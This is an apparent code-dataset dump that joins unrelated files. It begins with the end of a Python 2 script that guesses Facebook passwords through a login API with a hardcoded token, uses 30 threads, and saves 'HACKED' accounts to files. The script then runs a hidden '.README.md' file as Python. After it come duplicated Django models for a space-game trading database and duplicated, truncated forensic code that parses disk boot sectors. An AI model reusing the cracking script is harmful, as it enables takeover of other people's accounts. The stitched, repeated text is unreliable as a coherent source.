elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass18 + '\n')
cps.close()
cpb.append(c + user + pass18)
else:
pass19 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aab<PASSWORD>65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass19 + '\n')
okb.close()
oks.append(c + user + pass19)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass19 + '\n')
cps.close()
cpb.append(c + user + pass19)
else:
pass20 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass20 + '\n')
okb.close()
oks.append(c + user + pass20)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass20 + '\n')
cps.close()
cpb.append(c + user + pass20)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '-'
print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
os.system('python2 .README.md')
if __name__ == '__main__':
babaindseven() | 0.084887 | 0.069573 |
from django.db import models
from common.models import UUIDModel
# Create your models here.
class System(UUIDModel):
name = models.CharField(max_length=100)
needs_permit = models.NullBooleanField(default=False)
primary_economy = models.CharField(max_length=100, null=True)
population = models.BigIntegerField(default=0, null=True)
security = models.CharField(max_length=100, null=True)
allegiance = models.CharField(max_length=100, null=True)
government = models.CharField(max_length=100, null=True)
state = models.CharField(max_length=100, null=True)
faction = models.CharField(max_length=100, null=True)
power_control_faction = models.CharField(max_length=100, null=True)
x = models.FloatField()
y = models.FloatField()
z = models.FloatField()
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Station(UUIDModel):
name = models.CharField(max_length=100)
system = models.ForeignKey(System, related_name="stations", editable=False)
type = models.CharField(max_length=100, null=True, blank=True)
max_landing_pad_size = models.CharField(max_length=100, null=True, blank=True) # L or M
distance_to_star = models.BigIntegerField(default=0, null=True, blank=True) # Might change depending on orbit???
allegiance = models.CharField(max_length=100, null=True, blank=True)
government = models.CharField(max_length=100, null=True, blank=True)
state = models.CharField(max_length=100, null=True, blank=True)
faction = models.CharField(max_length=100, null=True, blank=True)
has_repair = models.NullBooleanField(default=False, blank=True)
has_blackmarket = models.NullBooleanField(default=False, blank=True)
has_refuel = models.NullBooleanField(default=False, blank=True)
has_rearm = models.NullBooleanField(default=False, blank=True)
has_shipyard = models.NullBooleanField(default=False, blank=True)
has_outfitting = models.NullBooleanField(default=False, blank=True)
has_commodities = models.NullBooleanField(default=False, blank=True)
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Commodity(UUIDModel):
name = models.CharField(max_length=100)
average_price = models.IntegerField(default=0, null=True, blank=True)
category_id = models.IntegerField(default=0, editable=False)
category_name = models.CharField(max_length=100, editable=False)
def __str__(self):
return self.name
class StationCommodity(UUIDModel):
commodity = models.ForeignKey(Commodity, related_name='station_commodities', editable=False)
station = models.ForeignKey(Station, related_name='station_commodities', editable=False)
buy_price = models.IntegerField(default=0)
supply = models.IntegerField(default=0)
supply_level = models.CharField(max_length=100, null=True, blank=True)
sell_price = models.IntegerField(default=0)
demand = models.IntegerField(default=0)
demand_level = models.CharField(max_length=100, null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-created']
def __str__(self):
return '%s/%s(%i/%i)' % (str(self.station), str(self.commodity), int(self.buy_price), int(self.sell_price)) | elitedata/models.py | from django.db import models
from common.models import UUIDModel
# Create your models here.
class System(UUIDModel):
name = models.CharField(max_length=100)
needs_permit = models.NullBooleanField(default=False)
primary_economy = models.CharField(max_length=100, null=True)
population = models.BigIntegerField(default=0, null=True)
security = models.CharField(max_length=100, null=True)
allegiance = models.CharField(max_length=100, null=True)
government = models.CharField(max_length=100, null=True)
state = models.CharField(max_length=100, null=True)
faction = models.CharField(max_length=100, null=True)
power_control_faction = models.CharField(max_length=100, null=True)
x = models.FloatField()
y = models.FloatField()
z = models.FloatField()
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Station(UUIDModel):
name = models.CharField(max_length=100)
system = models.ForeignKey(System, related_name="stations", editable=False)
type = models.CharField(max_length=100, null=True, blank=True)
max_landing_pad_size = models.CharField(max_length=100, null=True, blank=True) # L or M
distance_to_star = models.BigIntegerField(default=0, null=True, blank=True) # Might change depending on orbit???
allegiance = models.CharField(max_length=100, null=True, blank=True)
government = models.CharField(max_length=100, null=True, blank=True)
state = models.CharField(max_length=100, null=True, blank=True)
faction = models.CharField(max_length=100, null=True, blank=True)
has_repair = models.NullBooleanField(default=False, blank=True)
has_blackmarket = models.NullBooleanField(default=False, blank=True)
has_refuel = models.NullBooleanField(default=False, blank=True)
has_rearm = models.NullBooleanField(default=False, blank=True)
has_shipyard = models.NullBooleanField(default=False, blank=True)
has_outfitting = models.NullBooleanField(default=False, blank=True)
has_commodities = models.NullBooleanField(default=False, blank=True)
updated_at = models.BigIntegerField()
def __str__(self):
return self.name
class Commodity(UUIDModel):
name = models.CharField(max_length=100)
average_price = models.IntegerField(default=0, null=True, blank=True)
category_id = models.IntegerField(default=0, editable=False)
category_name = models.CharField(max_length=100, editable=False)
def __str__(self):
return self.name
class StationCommodity(UUIDModel):
commodity = models.ForeignKey(Commodity, related_name='station_commodities', editable=False)
station = models.ForeignKey(Station, related_name='station_commodities', editable=False)
buy_price = models.IntegerField(default=0)
supply = models.IntegerField(default=0)
supply_level = models.CharField(max_length=100, null=True, blank=True)
sell_price = models.IntegerField(default=0)
demand = models.IntegerField(default=0)
demand_level = models.CharField(max_length=100, null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-created']
def __str__(self):
return '%s/%s(%i/%i)' % (str(self.station), str(self.commodity), int(self.buy_price), int(self.sell_price)) | 0.619356 | 0.192217 |
from construct import *
import hexdump
import os
class EnvironmentVariable(object):
def __init__(self):
self.name = ""
self.value = ""
def environment_variable(self, current_machine):
list_env_var = []
for ve in current_machine.Win32_environment():
env_var = EnvironmentVariable()
env_var.name = ve.name
env_var.value = ve.VariableValue
list_env_var.append(env_var)
return list_env_var
def __str__(self):
output = ""
output += "Name : " + self.name + "\nValue :" + self.value
return output
class OperatingSystem(object):
def __init__(self):
self.version = ""
self.directory = ""
self.primary = ""
def os_information(self, current_machine):
for data in current_machine.Win32_OperatingSystem():
self.version = data.Caption
self.directory = data.SystemDirectory
self.primary = data.Primary
return self
def __str__(self):
output = ""
output += "\nOperating System :" + str(self.version) + "\nSystem Directory : " + str(
self.directory) + "\nPrimary Operating System : " + str(self.primary)
return output
class Disks(object):
def __init__(self):
self.Partitions = ""
self.physical = ""
self.bytesPerSector = 0
self.totalHeads = 0
self.totalSectors = 0
self.totalTracks = 0
self.tracksPerCylinder = 0
self.totalCylinders = 0
self.deviceID = ""
self.size = 0
def get_disk_information(self, current_machine):
disks = []
for physicalDisk in current_machine.Win32_DiskDrive():
disk = Disks()
disk.physical = physicalDisk.Caption
disk.deviceID = physicalDisk.DeviceID
disk.Partitions = physicalDisk.Partitions
disk.bytesPerSector = physicalDisk.BytesPerSector
disk.totalSectors = physicalDisk.TotalSectors
disk.totalCylinders = physicalDisk.TotalCylinders
disk.totalHeads = physicalDisk.TotalHeads
disk.totalSectors = physicalDisk.TotalSectors
disk.totalTracks = physicalDisk.TotalTracks
disk.tracksPerCylinder = physicalDisk.TracksPerCylinder
disk.size = physicalDisk.Size
disks.append(disk)
return disks
def __str__(self):
output = ""
output += "\nPhysical Disk : " + str(self.physical) + "\nPartitions : " + str(self.Partitions)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nTotal Heads :" + str(self.totalHeads)
output += "\nTotal Sectors : " + str(self.totalSectors) + "\nTotal Tracks :" + str(
self.totalTracks) + "\nTracks per Cylinder : " + str(self.tracksPerCylinder)
output += "\nTotal Cylinders : " + str(self.totalCylinders) + "\nSize :" + str(self.size) + "\n"
return output
class Partitions:
def __init__(self, path, logger):
self.logger = logger
self.path = path
self.type = ""
self.partName = ""
self.blockSize = 0
self.size = 0
self.bootSectorStruct = ""
self.disk = ""
self.bytesPerSector = 0
self.sectorPerCluster = 0
self.reservedSectors = ""
self.sectorsPerTrack = 0
self.numberOfHeads = 0
self.hiddenSectors = 0
self.totalSectors = 0
self.mftLogicalClusterNumber = 0
self.mftmirrLogicalClusterNumber = 0
self.clusterPerFileRecordSegment = 0
self.clustersPerIndexBuffer = 0
self.volumeSerialNumber = 0
self.numberCopiesFat = 0
self.maximumRootEntryDirectories = 0
self.numberOfSectorsSmaller32mb = 0
self.sectorsNumberFat = 0
self.fat32DriveVersion = ""
self.sectorNumberFsInformation = 0
self.sectorNumberPartition = 0
self.sectorNumberBackupBoot = 0
self.serialNumberPartition = ""
self.fatName = ""
self.possibleRootEntryNumber = 0
self.numberOfSectorsSmaller32mb
self.hexaBootSector = ""
self.fat12BootSector = Struct("FAT12 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("possible_root_entry _number"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("large_number_sector_greater_32mb"),
ULInt8("drive_number"),
ULInt8("reserved"),
ULInt8("extended_boot_signature"),
ULInt32("volumeSerialNumber"),
Bytes("volume_label", 11),
ULInt64("fs_type"),
Bytes("bootstrap_code", 448),
ULInt16("signature")
)
self.fat16BootSector = Struct("FAT16 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt16("logical_drive_number"),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 448),
Bytes("signature", 2)
)
self.fat32BootSector = Struct("FAT32 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("secors_per_fat_olderfatsystem"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt32("sectors_number_fat"),
ULInt16("flags"),
ULInt16("fat32Drive_version"),
ULInt32("cluster_number_start_of_rootDirectory"),
ULInt16("sector_number_fs_information"),
ULInt16("sector_number_backupBoot"),
Bytes("reserved", 12),
ULInt8("logical_drive_number"),
Bytes("unused", 1),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 420),
Bytes("signature", 2)
)
self.bootSectorNtfs = Struct("NTFS boot sector",
Bytes("jump", 3),
Bytes("oem_id", 8),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
Bytes("always 0", 3),
ULInt16("not used by NTFS"),
ULInt8("Media descriptor"),
Bytes("always0", 2),
ULInt16("sectorsPerTrack"),
ULInt16("numberOfHeads"),
ULInt32("hiddenSectors"),
Bytes("not_used_by_ntfs", 8),
ULInt64("totalSectors"),
ULInt64("mftLogicalClusterNumber"),
ULInt64("mftmirrLogicalClusterNumber"),
ULInt32("clusterPerFileRecordSegment"),
ULInt8("clustersPerIndexBuffer"),
Bytes("not_used_ntfs", 3),
ULInt64("volumeSerialNumber"),
ULInt32("checksum")
)
def partition_information(self, current_machine):
list_partitions = []
for physicalDisk in current_machine.Win32_DiskDrive():
for partitions in physicalDisk.associators("Win32_DiskDriveToDiskPartition"):
for logicalDisk in partitions.associators("Win32_LogicalDiskToPartition"):
partition = Partitions(self.path, self.logger)
partition.disk = physicalDisk.Caption
partition.partName = logicalDisk.Caption
partition.type = logicalDisk.FileSystem
partition.blockSize = logicalDisk.BlockSize
partition.size = logicalDisk.Size
localDrive = partition.partName + "\\"
ntfsdrive = '\\\\.\\' + localDrive.replace('\\', '')
partition = self.boot_sector_info(ntfsdrive, partition.type, partition)
list_partitions.append(partition)
return list_partitions
def boot_sector_info(self, part, type, partition):
bootSector = self.save_boot_sector(part)
self.extract_hexa(bootSector)
try:
cap1 = self.hexaBootSector.decode("hex")
if type == "NTFS":
self.bootSectorStruct = self.bootSectorNtfs.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.clusterPerFileRecordSegment = self.bootSectorStruct.clusterPerFileRecordSegment
partition.clustersPerIndexBuffer = self.bootSectorStruct.clustersPerIndexBuffer
partition.hiddenSectors = self.bootSectorStruct.hiddenSectors
partition.mftLogicalClusterNumber = self.bootSectorStruct.mftLogicalClusterNumber
partition.mftmirrLogicalClusterNumber = self.bootSectorStruct.mftmirrLogicalClusterNumber
partition.numberOfHeads = self.bootSectorStruct.numberOfHeads
partition.reservedSectors = self.bootSectorStruct.reservedSectors
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.totalSectors = self.bootSectorStruct.totalSectors
partition.volumeSerialNumber = self.bootSectorStruct.volumeSerialNumber
elif type == "Fat32":
self.bootSectorStruct = self.fat32BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_number_fat
partition.fat32DriveVersion = self.bootSectorStruct.fat32_drive_version
partition.sectorNumberFsInformation = self.bootSectorStruct.sector_number_fs_information
partition.sectorsNumberPartition = self.bootSectorStruct.sectors_number_partition
partition.sectorNumberBackupBoot = self.bootSectorStruct.sector_number_backup_boot
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat16":
self.bootSectorStruct = self.fat16BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_per_fat
partition.sectorNumberPartition = self.bootSectorStruct.sector_number_partition
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat12":
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.possibleRootEntryNumber = self.bootSectorStruct.possible_root_entry_number
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.fatName = self.bootSectorStruct.fs_type
return partition
except Exception as inst:
self.logger.error("Error : ", inst)
def save_boot_sector(self, image):
try:
file_image = open(image, "rb")
file_boot = open(self.path + os.path.sep + "boot sector", "w")
file_boot.write(hexdump.hexdump(file_image.read(512), "return"))
file_image.close()
file_boot.close()
except Exception as inst:
self.logger.error("Extracting mbr failed")
return file_boot.name
def extract_hexa(self, boot_sector):
try:
h_file = open(boot_sector, "rb")
hex_str = ""
for line in h_file.readlines():
hex_str += line[10:58]
for i in hex_str.split(" "):
self.hexaBootSector += i
h_file.close()
except Exception as inst:
self.logger.error("Error Extract Hexadecimal of bootSector")
def __str__(self):
output = ""
if self.type == "NTFS":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(self.size) + "\nTotal sectors : " + str(
self.totalSectors)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nSectors per cluster : " + str(
self.sectorPerCluster)
output += "\nSectors per track : " + str(
self.sectorsPerTrack) # + "\nReserved sectors : " + str(self.reservedSectors)
output += "\nHidden sectors : " + str(self.hiddenSectors) + "\nNumber of heads : " + str(self.numberOfHeads)
output += "\nLogical cluster number of MFT : " + str(
self.mftLogicalClusterNumber) + "\nLogical cluster number of MFTMIRR : " + str(
self.mftmirrLogicalClusterNumber)
output += "\nClusters per file record segment : " + str(
self.clusterPerFileRecordSegment) + "\nVolume serial number : " + str(self.volumeSerialNumber) + "\n"
elif self.type == "Fat32":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nVersion of FAT32 drive : " + str(self.fat32DriveVersion)
output += "\nSector number of the FileSystem information sector : " + str(self.sectorNumberFsInformation)
output += "\nSector number of the backupboot sector : " + str(
self.sectorNumberBackupBoot) + "\nSerial number of partition : " + str(
self.serialNumberPartition) + "\n"
elif self.type == "Fat16":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nNumber of sectors in partition : " + str(self.sectorNumberPartition)
output += "\nSerial number of partition : " + str(self.serialNumberPartition) + "\nFat name : " + str(
self.fatName) + "\n"
elif self.type == "Fat12":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nPossible root entry number :" + str(
self.possibleRootEntryNumber)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(
self.numberOfSectorsSmaller32mb) + "\nFat name : " + str(self.fatName) + "\n"
return output | Fastir_Collector/dump/environment_settings.py | from construct import *
import hexdump
import os
class EnvironmentVariable(object):
def __init__(self):
self.name = ""
self.value = ""
def environment_variable(self, current_machine):
list_env_var = []
for ve in current_machine.Win32_environment():
env_var = EnvironmentVariable()
env_var.name = ve.name
env_var.value = ve.VariableValue
list_env_var.append(env_var)
return list_env_var
def __str__(self):
output = ""
output += "Name : " + self.name + "\nValue :" + self.value
return output
class OperatingSystem(object):
def __init__(self):
self.version = ""
self.directory = ""
self.primary = ""
def os_information(self, current_machine):
for data in current_machine.Win32_OperatingSystem():
self.version = data.Caption
self.directory = data.SystemDirectory
self.primary = data.Primary
return self
def __str__(self):
output = ""
output += "\nOperating System :" + str(self.version) + "\nSystem Directory : " + str(
self.directory) + "\nPrimary Operating System : " + str(self.primary)
return output
class Disks(object):
def __init__(self):
self.Partitions = ""
self.physical = ""
self.bytesPerSector = 0
self.totalHeads = 0
self.totalSectors = 0
self.totalTracks = 0
self.tracksPerCylinder = 0
self.totalCylinders = 0
self.deviceID = ""
self.size = 0
def get_disk_information(self, current_machine):
disks = []
for physicalDisk in current_machine.Win32_DiskDrive():
disk = Disks()
disk.physical = physicalDisk.Caption
disk.deviceID = physicalDisk.DeviceID
disk.Partitions = physicalDisk.Partitions
disk.bytesPerSector = physicalDisk.BytesPerSector
disk.totalSectors = physicalDisk.TotalSectors
disk.totalCylinders = physicalDisk.TotalCylinders
disk.totalHeads = physicalDisk.TotalHeads
disk.totalSectors = physicalDisk.TotalSectors
disk.totalTracks = physicalDisk.TotalTracks
disk.tracksPerCylinder = physicalDisk.TracksPerCylinder
disk.size = physicalDisk.Size
disks.append(disk)
return disks
def __str__(self):
output = ""
output += "\nPhysical Disk : " + str(self.physical) + "\nPartitions : " + str(self.Partitions)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nTotal Heads :" + str(self.totalHeads)
output += "\nTotal Sectors : " + str(self.totalSectors) + "\nTotal Tracks :" + str(
self.totalTracks) + "\nTracks per Cylinder : " + str(self.tracksPerCylinder)
output += "\nTotal Cylinders : " + str(self.totalCylinders) + "\nSize :" + str(self.size) + "\n"
return output
class Partitions:
def __init__(self, path, logger):
self.logger = logger
self.path = path
self.type = ""
self.partName = ""
self.blockSize = 0
self.size = 0
self.bootSectorStruct = ""
self.disk = ""
self.bytesPerSector = 0
self.sectorPerCluster = 0
self.reservedSectors = ""
self.sectorsPerTrack = 0
self.numberOfHeads = 0
self.hiddenSectors = 0
self.totalSectors = 0
self.mftLogicalClusterNumber = 0
self.mftmirrLogicalClusterNumber = 0
self.clusterPerFileRecordSegment = 0
self.clustersPerIndexBuffer = 0
self.volumeSerialNumber = 0
self.numberCopiesFat = 0
self.maximumRootEntryDirectories = 0
self.numberOfSectorsSmaller32mb = 0
self.sectorsNumberFat = 0
self.fat32DriveVersion = ""
self.sectorNumberFsInformation = 0
self.sectorNumberPartition = 0
self.sectorNumberBackupBoot = 0
self.serialNumberPartition = ""
self.fatName = ""
self.possibleRootEntryNumber = 0
self.numberOfSectorsSmaller32mb
self.hexaBootSector = ""
self.fat12BootSector = Struct("FAT12 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("possible_root_entry _number"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("large_number_sector_greater_32mb"),
ULInt8("drive_number"),
ULInt8("reserved"),
ULInt8("extended_boot_signature"),
ULInt32("volumeSerialNumber"),
Bytes("volume_label", 11),
ULInt64("fs_type"),
Bytes("bootstrap_code", 448),
ULInt16("signature")
)
self.fat16BootSector = Struct("FAT16 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt16("logical_drive_number"),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 448),
Bytes("signature", 2)
)
self.fat32BootSector = Struct("FAT32 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("secors_per_fat_olderfatsystem"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt32("sectors_number_fat"),
ULInt16("flags"),
ULInt16("fat32Drive_version"),
ULInt32("cluster_number_start_of_rootDirectory"),
ULInt16("sector_number_fs_information"),
ULInt16("sector_number_backupBoot"),
Bytes("reserved", 12),
ULInt8("logical_drive_number"),
Bytes("unused", 1),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 420),
Bytes("signature", 2)
)
self.bootSectorNtfs = Struct("NTFS boot sector",
Bytes("jump", 3),
Bytes("oem_id", 8),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
Bytes("always 0", 3),
ULInt16("not used by NTFS"),
ULInt8("Media descriptor"),
Bytes("always0", 2),
ULInt16("sectorsPerTrack"),
ULInt16("numberOfHeads"),
ULInt32("hiddenSectors"),
Bytes("not_used_by_ntfs", 8),
ULInt64("totalSectors"),
ULInt64("mftLogicalClusterNumber"),
ULInt64("mftmirrLogicalClusterNumber"),
ULInt32("clusterPerFileRecordSegment"),
ULInt8("clustersPerIndexBuffer"),
Bytes("not_used_ntfs", 3),
ULInt64("volumeSerialNumber"),
ULInt32("checksum")
)
def partition_information(self, current_machine):
list_partitions = []
for physicalDisk in current_machine.Win32_DiskDrive():
for partitions in physicalDisk.associators("Win32_DiskDriveToDiskPartition"):
for logicalDisk in partitions.associators("Win32_LogicalDiskToPartition"):
partition = Partitions(self.path, self.logger)
partition.disk = physicalDisk.Caption
partition.partName = logicalDisk.Caption
partition.type = logicalDisk.FileSystem
partition.blockSize = logicalDisk.BlockSize
partition.size = logicalDisk.Size
localDrive = partition.partName + "\\"
ntfsdrive = '\\\\.\\' + localDrive.replace('\\', '')
partition = self.boot_sector_info(ntfsdrive, partition.type, partition)
list_partitions.append(partition)
return list_partitions
def boot_sector_info(self, part, type, partition):
bootSector = self.save_boot_sector(part)
self.extract_hexa(bootSector)
try:
cap1 = self.hexaBootSector.decode("hex")
if type == "NTFS":
self.bootSectorStruct = self.bootSectorNtfs.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.clusterPerFileRecordSegment = self.bootSectorStruct.clusterPerFileRecordSegment
partition.clustersPerIndexBuffer = self.bootSectorStruct.clustersPerIndexBuffer
partition.hiddenSectors = self.bootSectorStruct.hiddenSectors
partition.mftLogicalClusterNumber = self.bootSectorStruct.mftLogicalClusterNumber
partition.mftmirrLogicalClusterNumber = self.bootSectorStruct.mftmirrLogicalClusterNumber
partition.numberOfHeads = self.bootSectorStruct.numberOfHeads
partition.reservedSectors = self.bootSectorStruct.reservedSectors
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.totalSectors = self.bootSectorStruct.totalSectors
partition.volumeSerialNumber = self.bootSectorStruct.volumeSerialNumber
elif type == "Fat32":
self.bootSectorStruct = self.fat32BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
